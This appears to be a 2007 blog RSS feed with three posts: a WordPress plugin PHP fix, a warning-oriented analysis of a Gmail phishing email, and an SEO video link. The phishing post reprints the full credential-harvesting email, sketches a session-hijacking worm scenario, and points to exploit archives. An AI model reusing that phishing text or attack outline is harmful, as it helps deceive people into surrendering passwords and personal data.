Fatal error: Cannot redeclare class httprequest in /../wp-content/plugins/gravatars2.php on line 284
</pre>
<h2 class="sep">HTTPRequest Classname Conflict</h2>
<p>It&#8217;s not that hard to fix this &#8220;Naming Conflicts&#8221;. All you need is &#8220;Search and Replace&#8221; <strong>HTTPRequest</strong> class name to different name (ie: _HTTPRequest, HTTP__Request) so it wont conflict with PHP HTTPRequest Standard Class. If you don&#8217;t know how to do this. Check the below lists. It wont take long.</p>
<ol class="nfo">
<li>Open <tt>wp-content/plugins/gravatars2.php</tt> or <tt>http://www.my-domain-name.com/wp-admin/plugin-editor.php?file=gravatars2.php</tt></li>
<li>Find on line <span class="b">284</span>
<pre>class HTTPRequest</pre>
<p>Replace with </p>
<pre>class _HTTPRequest</pre>
</li>
<li>Next find on line <span class="b">323</span>
<pre>function HTTPRequest($url, $timeout)</pre>
<p>Replace with </p>
<pre>function _HTTPRequest($url, $timeout)</pre>
</li>
<li>Final step find on line <span class="b">408</span>
<pre>$hr = new HTTPRequest($url, $timeout);</pre>
<p>Replace with </p>
<pre>$hr = new _HTTPRequest($url, $timeout);</pre>
</li>
<li>Save or upload back to wp-content/plugins/</li>
</ol>
<p>Thats all</p>
<h2 class="sep">Gravatars2</h2>
<p>For the record - &#8220;Gravatar2 developer doesn&#8217;t give support without donation&#8221;.</p>
<p><em>Excerpt from <a href="http://zenpax.com/gravatars2/discussion/#comment-1" rel="nofollow">Kip Bond at zenpax.com</a></em></p>
<blockquote cite="http://zenpax.com/gravatars2/discussion/#comment-1"><p>I am no longer giving support for this plugin without a donation — it’s becoming repetitive and not very rewarding. You can email me (kip @ this website’s hostname (zenpax.com)) with your question, and I can tell you what minimum donation amount is sufficient per the difficulty of the question. Note that this donation in no way obligates me to any contractual duties. It’s mostly a way to make sure that people have exhausted their own efforts at resolving their own problems before asking for my support. ~<a href="http://zenpax.com/">kip Bond</a></p></blockquote>
<p>I hope these would explain some curiosity.</p>
<p>tips to php developer: used <tt>class_exists</tt> before declaring any user define class.</p>
<h2 class="sep">Related Links</h2>
<ul>
<li><a href="http://zenpax.com/gravatars2/discussion/" rel="nofollow">Gravatars2 Discussion &#038; Support page</a>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/tips/how-to-fixes-gravatars2-httprequest-fatal-error-php5-classname-conflicts/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Email Phishing and Spams Trends - Be wary</title>
		<link>http://42.kaizeku.com/security/vulnerability/email-phising-and-spam-trends/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/email-phising-and-spam-trends/#comments</comments>
		<pubDate>Tue, 11 Dec 2007 14:09:28 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Gmail]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[email]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[Google]]></category>

		<category><![CDATA[jpeg+exploit]]></category>

		<category><![CDATA[microsoft]]></category>

		<category><![CDATA[millw0rm]]></category>

		<category><![CDATA[phishing]]></category>

		<category><![CDATA[tiff+exploit]]></category>

		<category><![CDATA[vx+heavens]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/vulnerability/email-phising-and-spam-trends/</guid>
		<description><![CDATA[<p><img src='http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004669852.gif' alt='Google Gmail Logo' class="fl" width="130" height="54" />Below is typical phishing email I received on <cite style="background:#ffd;color:#000;padding: 1px 3px">Dec 8, 2007</cite>. It was send to one of my active gmail accounts. </p>

<dl class="xoxo r cb" style="list-style-type:none;width:98%;margin: 18px auto;border:1px solid #eee;padding:10px">
<dd>
<h2 class="cb" style="margin-top:9px;border-bottom: 1px solid #ccc">The Email Header</h2>
	<dl id="phising-email" class="profile cf cb">
	<dt class="fl cl" style="width:50px">From</dt>
	<dd><strong style="font-weight:400">"Gmail Team" &#60;customercareteamalert4@gmail.com&#62;</strong></dd>
	<dt class="fl cl" style="width:50px">Subject</dt>
		<dd><strong style="font-weight:400">Gmail Warning!!!! Verify Your Gmail Account To Avoid Close</strong>.</dd>
	<dt class="cl" style="border-top:1px solid#ccc;padding:9px 0px;margin-top:4px">Part of the message &#8595;</dt>
	<dd><blockquote cite="http://gmail.com/">
	<p> 
	Dear member,<br/>
	This message is from gmail message center to all gmail free account owners
	and premium account owners. We are currently upgrading our data base and
	e-mail account center. We are deleting all unused gmail account to create
	more space for new accounts.
	
	 *To prevent your account from closing, you will have to verify it below so
	that we will know that it's a present used account.*
	
	* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!! [...]</p>
	</blockquote>
	</dd>
	</dl>
</dd>
</dl>]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004669852.gif' alt='Google Gmail Logo' class="fl" width="130" height="54" />Below is typical phishing email I received on <cite style="background:#ffd;color:#000;padding: 1px 3px">Dec 8, 2007</cite>. It was send to one of my active gmail accounts. </p>
<p><span id="more-78"></span></p>
<dl class="xoxo r cb" style="list-style-type:none;width:511px;margin: 18px auto;border:1px solid #eee;padding:10px">
<dd>
<h2 class="cb" style="margin-top:9px;border-bottom: 1px solid #ccc">The Email Header</h2>
<dl id="phising-email" class="profile cf cb">
<dt class="fl cl" style="width:50px">From</dt>
<dd><strong style="font-weight:400">&#8220;Gmail Team&#8221; &lt;customercareteamalert4@gmail.com&gt;</strong></dd>
<dt class="fl cl" style="width:50px">Subject</dt>
<dd><strong style="font-weight:400">Gmail Warning!!!! Verify Your Gmail Account To Avoid Close</strong>.</dd>
<dt class="cl" style="border-top:1px solid#ccc;padding:9px 0px;margin-top:4px">Part of the message &darr;</dt>
<dd>
<blockquote cite="http://gmail.com/">
<p>
Dear member,<br/><br />
This message is from gmail message center to all gmail free account owners<br />
and premium account owners. We are currently upgrading our data base and<br />
e-mail account center. We are deleting all unused gmail account to create<br />
more space for new accounts.</p>
<p> *To prevent your account from closing, you will have to verify it below so<br />
that we will know that it&#8217;s a present used account.*</p>
<p>* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!! [...]</p>
</blockquote>
</dl>
<h3 class="cb">Raw Email Content</h3>
<p>This are part of of the raw message on gmail its not download via pop3. Certain meta info is not available as its got filtered by gmail services (spam automatic removal). </p>
<pre style="460px;height:300px;overflow:auto;border:1px solid #ccc">
Delivered-To random-victims-name@gmail.com
Received: by 10.114.235.19 with SMTP id i19cs230694wah;
 Sat, 8 Dec 2007 04:27:12 -0800 (PST)
Received: by 10.141.20.7 with SMTP id x7mr3231780rvi.1197116792300;
 Sat, 08 Dec 2007 04:26:32 -0800 (PST)
Received: by 10.141.115.15 with HTTP; Sat, 8 Dec 2007 04:26:32 -0800 (PST)
Message-ID: &lt;2f83b9150712080426n4a018c86mc2af4a4ed271f223@mail.gmail.com&gt;
Date: Sat, 8 Dec 2007 13:26:32 +0100
From: &quot;Gmail Team&quot; &lt;customercareteamalert4@gmail.com&gt;
Reply-To: customercareteamalert2@gmail.com
Subject: Gmail Warning!!!! Verify Your Gmail Account To Avoid Close.
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=&quot;----=_Part_11145_31274162.1197116792293&quot;

------=_Part_11145_31274162.1197116792293
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

 Dear Member*,* **
 * Account Alert*
***
 *
 *VERIFY YOUR GMAIL ACCOUNT NOW TO AVOID CLOSE !!!*
***GMAI L
*Dear Member*,*
 This message is from gmail message center to all gmail free account owners
and premium account owners. We are currently upgrading our data base and
e-mail account center. We are deleting all unused gmail account to create
more space for new accounts.

 *To prevent your account from closing, you will have to verify it below so
that we will know that it's a present used account.*

* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!!

 &lt;http://amazon.com/&gt;
 Gmail! ID:.........................

 Password:........................

 Your Birthday:.................

 Your Country or Territory:...........
 Enter the Security
Characters:......... [image: Registration
Verification Code]
*

 *Warning!!! **Account owner that refuses to update his or her account
before two weeks of receiving this warning will lose his or her account
permanently. *
**
*Sincerely,*
*Gmail Team*

------=_Part_11145_31274162.1197116792293
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

&lt;table style=&quot;WIDTH: 595px; HEIGHT: 813px&quot; width=&quot;595&quot; border=&quot;0&quot;&gt;
&lt;tbody&gt;
&lt;tr bgcolor=&quot;#cccc99&quot;&gt;
&lt;td valign=&quot;center&quot; colspan=&quot;3&quot;&gt;&lt;font face=&quot;Arial,Helvetica&quot; color=&quot;#333300&quot; size=&quot;+0&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;Dear&amp;nbsp;&lt;font size=&quot;3&quot;&gt;Member&lt;/font&gt;&lt;strong&gt;,&lt;/strong&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td colspan=&quot;3&quot;&gt;&lt;font face=&quot;Arial,Helvetica&quot; size=&quot;-1&quot;&gt;
&lt;div align=&quot;center&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 23px; FONT-FAMILY: Arial&quot;&gt;&lt;b&gt;&lt;font color=&quot;#dd6600&quot;&gt;
&lt;img style=&quot;WIDTH: 430px; HEIGHT: 99px&quot; height=&quot;330&quot; src=&quot;http://www.google.com/intl/en/press/images/logos/gmail.jpg&quot; width=&quot;418&quot;&gt;&lt;/font&gt;&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;
&lt;div&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 23px; FONT-FAMILY: Arial&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;font color=&quot;#ff0000&quot;&gt;
&amp;nbsp;Account Alert&lt;/font&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/div&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 23px; FONT-FAMILY: Arial&quot;&gt;&lt;strong&gt;
&lt;/strong&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;font face=&quot;Arial&quot; color=&quot;#ff0000&quot;&gt;&lt;/font&gt;&lt;/u&gt;&lt;br&gt;&amp;nbsp; &lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;
&lt;table cellspacing=&quot;0&quot; cellpadding=&quot;4&quot; width=&quot;585&quot; border=&quot;0&quot;&gt;
&lt;tbody&gt;
&lt;tr bgcolor=&quot;#a0b8c8&quot;&gt;
&lt;td colspan=&quot;2&quot;&gt;
&lt;div align=&quot;center&quot;&gt;&lt;font face=&quot;Arial&quot;&gt;&lt;font face=&quot;Arial Narrow&quot; size=&quot;4&quot;&gt;&lt;u&gt;&lt;strong&gt;VERIFY YOUR GMAIL ACCOUNT NOW TO AVOID CLOSE&amp;nbsp;!!!&lt;/strong&gt;&lt;/u&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;strong&gt;&lt;font size=&quot;5&quot;&gt;&lt;font face=&quot;arial&quot;&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;
&lt;font face=&quot;Arial
 Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;strong&gt;&lt;font face=&quot;Arial&quot;&gt;&lt;font size=&quot;7&quot;&gt;&lt;u&gt;&lt;font color=&quot;#0000bf&quot;&gt;G&lt;/font&gt;&lt;font color=&quot;#ff0000&quot;&gt;M&lt;/font&gt;&lt;font color=&quot;#ffff00&quot;&gt;A&lt;/font&gt;&lt;font color=&quot;#0000bf&quot;&gt;I&lt;/font&gt;&lt;font color=&quot;#007f40&quot;&gt;
 L&lt;/font&gt;&lt;/u&gt;&lt;/font&gt;&lt;/font&gt;&lt;br&gt;&lt;/strong&gt;&lt;span style=&quot;FONT-SIZE: 21px; FONT-FAMILY: Arial&quot;&gt;&lt;font color=&quot;#ff0000&quot;&gt;Dear&lt;/font&gt;&lt;font color=&quot;#ff0000&quot;&gt;&amp;nbsp;Member&lt;/font&gt;&lt;font color=&quot;#ff0000&quot;&gt;&lt;strong&gt;,&lt;/strong&gt;&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;
 &lt;/font&gt;&lt;/div&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;font face=&quot;Arial Cyr&quot; color=&quot;#124282&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;&lt;font color=&quot;#0000ff&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; FONT-FAMILY: Arial&quot;&gt;&lt;font color=&quot;#00007f&quot;&gt;This message is from gmail message center to all&amp;nbsp;gmail free account owners and premium account owners. We are currently upgrading our data base and e-mail account center. We are deleting all unused&amp;nbsp;gmail account to create more space for new accounts.
&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;&lt;/span&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;font face=&quot;Times

 New

 Roman&quot;&gt;&lt;strong&gt;To prevent your account from closing, you will have to&amp;nbsp;verify it&amp;nbsp;below so that we will know that it&amp;#39;s a present used account.&lt;/strong&gt;&lt;/font&gt;&lt;/div&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130)&quot;&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130)&quot;&gt;&lt;/span&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;
&lt;table cellspacing=&quot;0&quot; cellpadding=&quot;4&quot; width=&quot;585&quot; border=&quot;0&quot;&gt;
&lt;tbody&gt;
&lt;tr bgcolor=&quot;#a0b8c8&quot;&gt;
&lt;td colspan=&quot;2&quot;&gt;&lt;font size=&quot;4&quot;&gt;
&lt;div&gt;&lt;strong&gt;
&lt;font size=&quot;4&quot;&gt;
&lt;div&gt;&lt;strong&gt;CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!!&lt;/strong&gt; &lt;/div&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;
&lt;div&gt;&lt;strong&gt;&lt;font size=&quot;5&quot;&gt;&lt;font face=&quot;arial&quot;&gt;&amp;nbsp;
&lt;div&gt;
&lt;div&gt;&lt;img style=&quot;WIDTH: 469px; HEIGHT: 75px&quot; height=&quot;75&quot; src=&quot;http://pics.ebaystatic.com/aw/pics/securityCenter/hdr1_649x75.gif&quot; width=&quot;649&quot;&gt;&lt;/div&gt;
&lt;div&gt;&lt;font size=&quot;2&quot;&gt;&lt;font face=&quot;Verdana&quot;&gt;&lt;strong&gt;&lt;a href=&quot;http://amazon.com/&quot; target=&quot;_blank&quot; rel=&quot;nofollow&quot;&gt;&lt;span id=&quot;lw_1190759841_12&quot;&gt;&lt;font color=&quot;#003399&quot;&gt;&lt;/font&gt;&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&amp;nbsp;&lt;/div&gt;&lt;/div&gt;&lt;/font&gt;
&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;font size=&quot;5&quot;&gt;&lt;font face=&quot;arial&quot;&gt;&lt;font face=&quot;arial narrow&quot; size=&quot;4&quot;&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Gmail! ID:.........................&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Password:........................&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;font size=&quot;4&quot;&gt;&lt;font face=&quot;arial narrow&quot;&gt;&lt;strong style=&quot;FONT-FAMILY: arial narrow&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your Birthday:.................&lt;/span&gt;&lt;/strong&gt;
 &lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;font size=&quot;4&quot;&gt;&lt;font face=&quot;arial
 narrow&quot;&gt;&lt;strong style=&quot;FONT-FAMILY: arial narrow&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&lt;label for=&quot;persistent&quot;&gt;&lt;/label&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your Country or Territory:...........&lt;/span&gt;&lt;/strong&gt; &lt;/div&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;
&lt;/div&gt;
&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Enter the &lt;strong&gt;Security Characters:.........&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;img style=&quot;WIDTH: 125px; HEIGHT: 38px&quot; alt=&quot;Registration Verification Code&quot; src=&quot;https://ab.login.yahoo.com/img/LVnEpeVZFekTjDHcj06RTVxEZ3._lwVb0bZmRLXJUxldX3JOnZnejReq4nmXD_..xGmoMjBT9h9WFcSARc5o427WyZP6hQ1z1juqhTkOyV68FA04yd2HiHVj.jpg&quot; border=&quot;0&quot;&gt;
 &lt;/strong&gt;&lt;/div&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;&lt;/span&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;&lt;img style=&quot;WIDTH: 148px; HEIGHT: 53px&quot; height=&quot;139&quot; src=&quot;http://www.genbeta.com/images/2007/01/gmail%20logo%20blanco.gif&quot; width=&quot;118&quot;&gt;
 &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: red; FONT-FAMILY: Arial&quot;&gt;Warning!!! &amp;nbsp;&lt;/span&gt; &lt;/strong&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: black&quot;&gt;Account owner that refuses to update his or her account before two weeks of receiving this warning will lose his or her account permanently.
&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: black&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: black&quot;&gt;Sincerely,&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: black&quot;&gt;Gmail Team&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;

------=_Part_11145_31274162.1197116792293--
</pre>
<dt style="margin-bottom:10px">
They used Outlook to published this email and leeched numbers of images across different &#8220;known&#8221; web services &darr;</dt>
<dd class="title" style="border-bottom:1px dotted #ccc"><span class="fl" style="width:100px">Image</span> <span>Sources</span></dd>
<dd class="cl"><span class="fl" style="width:100px"> Gmail Logo: </span> <a href="http://www.google.com/intl/en/press/images/logos/gmail.jpg">Google Presskit logo</a></dd>
<dd class="fl"><span class="fl" style="width:100px">Captcha :</span> <a href="https://ab.login.yahoo.com/img/LVnEpeVZFekTjDHcj06RTVxEZ3._lwVb0bZmRLXJUxldX3JOnZnejReq4nmXD_..xGmoMjBT9h9WFcSARc5o427WyZP6hQ1z1juqhTkOyV68FA04yd2HiHVj.jpg">yahoo (SSL)</a></dd>
<dd class="cl"><span class="fl" style="width:100px">Gmail Logo 2:</span> <a href="http://www.genbeta.com/images/2007/01/gmail%20logo%20blanco.gif">genbeta.com</a> (might be their host)</dd>
<dd class="cl"><span class="fl" style="width:100px">Header:</span> <a href="http://pics.ebaystatic.com/aw/pics/securityCenter/hdr1_649x75.gif">EbayStatic Server</a></dd>
</dl>
<h2>Whats the motiff</h2>
<p>It may seem funny to read the message as this are pretty much a script kiddies at work. I&#8217;m sure that most savvy users will not trust this types of threat. But what most people unaware of is the &#8220;Image&#8221; portions of the message. It can play a big role for expoiting email.</p>
<p class="note" style="padding:10px;margin:10px;width:85%;border:1px solid #eee"><span style="font-weight:700">QuickInfo:</span> Spam &#8220;images&#8221; trends start around <a href="http://www.ironport.com/">june 2006</a> and earlier version of popular email client (Outlook and Thunderbird) doesn&#8217;t block images by default. </p>
<p> If you are familliar with Internet Security in general,you may notice that there is many attemp and proof of concept method in exploiting Images like &#8220;<a href="http://blog.kakkoi.net/uri/aHR0cDovL21pbHcwcm0ub3JnL2V4cGxvaXRzLzQ2MTY.curie,80,302" rel="external nofollow" title="Tiff Exploit Sources at Milw0rm">TIFF</a> &#038; <a href="http://www.google.com/search?q=microsoft+jpeg+exploit" rev="google:query" rel="external">JPEG</a>&#8220;. Both of this vulnurebilities exists in Internet Explorer Browser and various microsoft windows products. While we can only make educated guesses as there is no real working proof yet.</p>
<p><tt>My doodling scenario produce this &darr;</tt></p>
<p class="note" style="padding:10px;margin:10pxl;background-color:#f9f9f9;width:95%"> Session &#8220;hacker&#8221; create a malicious server side image &rarr; proxy tunnel send to multiple email server &rarr; the curious victim open the email &rarr; steal client informations (cookie or server session cookie) &rarr; spoof the request &rarr; send RST back to client (reset) &rarr; dump the victims data in one instance. &rarr; write signature on victim email (avoid loop) &rarr; propogate using victims session &rarr; new net-worm is born</p>
<p> Try <abbr title="search">digging</abbr> around <strong>VX Heavens</strong> &#038; <strong>milw0rm</strong> Database you&#8217;ll find something to start thinkering.</p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/email-phising-and-spam-trends/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Matt Cutts Guide on Labeling Image Attributes - Search Engine Optimizations Tips</title>
		<link>http://42.kaizeku.com/google/matt-cutts-guide-on-labeling-image-attributes-search-engine-optimizations-tips/</link>
		<comments>http://42.kaizeku.com/google/matt-cutts-guide-on-labeling-image-attributes-search-engine-optimizations-tips/#comments</comments>
		<pubDate>Sun, 09 Dec 2007 16:34:31 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Google]]></category>

		<category><![CDATA[Search Engine Optimization]]></category>

		<category><![CDATA[YouTube]]></category>

		<category><![CDATA[html]]></category>

		<category><![CDATA[matt+cutts]]></category>

		<category><![CDATA[meta]]></category>

		<category><![CDATA[seo]]></category>

		<category><![CDATA[Tips]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/google/matt-cutts-guide-on-labeling-image-attributes-search-engine-optimizations-tips/</guid>
		<description><![CDATA[<img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/google-logo.gif' width="128" height="53" style="fl" alt='google logo' />IMG ALT attribute is one of favorites places for spamming keywords. (Blackhat SEO). 

As this has been a trend lately so <a title="Head of Google Webspam Team" href="http://www.mattcutts.com/blog/ "><strong style="font-weight:400">Matt Cutts</strong></a> (Google Head of Webspam Team) provide a  general guide on applying <em>"proper"</em> ALT attributes inside image tags.  Check out the video &#8594;. ]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/google-logo.gif' width="128" height="53" style="fl" alt='google logo' />IMG ALT attribute is one of favorites places for spamming keywords. (Blackhat SEO). </p>
<p>As this has been a trend lately so <a title="Head of Google Webspam Team" href="http://www.mattcutts.com/blog/ "><strong style="font-weight:400">Matt Cutts</strong></a> (Google Head of Webspam Team) provide a general guide on applying <em>&#8220;proper&#8221;</em> ALT attributes inside image tags. Check out the video &darr;.<br />
<span id="more-74"></span></p>
<div id="youtube" style="width:425px;margin:36px auto">
<object width="425" height="355"><param name="movie" value="http://www.youtube.com/v/3NbuDpB_BTc&#038;rel=1&#038;border=0"></param><param name="wmode" value="transparent"></param><embed src="http://www.youtube.com/v/3NbuDpB_BTc&#038;rel=1&#038;border=0" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"></embed></object>
</div>
<p class="footnotes" style="padding:10px;margin:18px 10px;border:1px solid #eee">
Video posted by Ríona MacNamara at <a href="http://googlewebmastercentral.blogspot.com/">Google Webmaster Central Blog</a>.</p>
<!-- google_ad_section_end -->
]]></content:encoded>
